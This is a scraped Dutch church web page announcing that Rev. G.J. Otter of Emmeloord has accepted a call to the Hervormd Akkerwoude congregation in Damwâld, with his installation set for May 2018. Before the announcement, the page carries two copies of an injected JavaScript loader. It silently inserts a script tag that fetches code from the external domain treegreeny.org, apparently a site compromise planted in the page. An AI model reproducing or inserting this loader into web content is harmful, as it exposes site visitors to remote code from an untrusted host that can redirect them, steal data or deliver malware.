;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ds. G.J. Otter neemt beroep aan ! - PKN Damwâld

Ds. G.J. Otter neemt beroep aan !

Gepubliceerd op: zondag 14 januari 2018

Blij en dankbaar deelt de kerkenraad van Hervormd Akkerwoude c.a. u mee dat ds. G.J. Otter uit Emmeloord het beroep naar onze gemeente heeft aangenomen. Een verheugende mededeling zo aan het begin van het nieuwe jaar. In de persoon van ds. Otter menen wij een predikant te hebben gevonden die onze gemeente opnieuw kan inspireren. Ds. Otter past bij onze gemeente en bij onze situatie. Een bewogen mens, openstaand voor de ander, jong van geest en energiek.

De afgelopen weken waren voor ds. G.J. Otter en zijn gezin behoorlijk intensieve weken. Zij hebben zich bij de kerkdienst op zondag 24 december en in de daaropvolgende kennismakingsgesprekken op woensdag 27 december warm welkom gevoeld in onze gemeente. Zij hebben zich een goed beeld kunnen vormen van onze gemeente en de uitdagingen die er liggen.

De bevestiging en intrede van onze nieuwe gemeentepredikant zullen D.V. 13 mei 2018 plaatsvinden. In dankbaarheid en vertrouwen zien we ernaar uit als ds. Otter straks onze gemeente geïnspireerd en betrokken mag gaan dienen. Daarbij weten we ons verbonden met de Protestantse gemeente Emmeloord. De beslissing om naar Damwâld te komen hebben ds. Otter en zijn gezin van harte genomen. Tegelijk beseffen ze dat het een afscheid is van de wijkgemeente Hervormd West waar zij in totaal 13 jaar lid van zijn geweest. Wij denken dan ook aan onze broeders en zusters in Emmeloord die hen zeker zullen gaan missen.

Met de komst van ds. Otter sluiten we een vacante periode af van bijna een jaar. Een hartelijk woord van dank aan de beroepingscommissie en consulent is hier zeker op zijn plaats. Maar bove­nal dank aan God dat wij op deze rijke wijze geze­gend zijn met een nieuwe herder en leraar. Vanuit dat geloof zien wij de toekomst met vertrouwen tegemoet. Wij hopen en bidden dat wij samen, als gemeente en nieuwe predikant, een goede tijd zullen ontvangen.